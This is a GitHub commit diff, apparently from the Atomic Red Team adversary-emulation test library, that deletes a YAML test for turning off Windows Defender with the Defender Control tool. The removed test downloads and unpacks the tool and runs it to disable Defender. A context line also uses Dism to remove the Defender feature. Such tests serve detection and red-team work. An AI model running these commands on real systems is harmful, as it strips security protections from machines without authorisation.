removing: Disable Defender with Defender Control (#2461)

Carrie Roberts
2023-06-15 09:28:12 -07:00
committed by GitHub
parent cef46e4479
commit db1a2cf461
+1 -32
@@ -551,38 +551,7 @@ atomic_tests:
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
name: command_prompt
elevation_required: true
- name: Disable Defender with Defender Control
auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6
description: |
Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off.
supported_platforms:
- windows
input_arguments:
DefenderID:
description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window).
type: string
default: FFFF
DefenderControlExe:
description: Path to Defender Control software version 1.6.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\DefenderControl\DefenderControl\DefenderControl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Defender Control must be installed on the machine.
prereq_command: |
if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip"
expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\DefenderControl"
executor:
command: |
cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
cleanup_command: |
cmd /c #{DefenderControlExe} /E | Out-Null
name: powershell
elevation_required: true
- name: Disable Defender Using NirSoft AdvancedRun
auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
description: |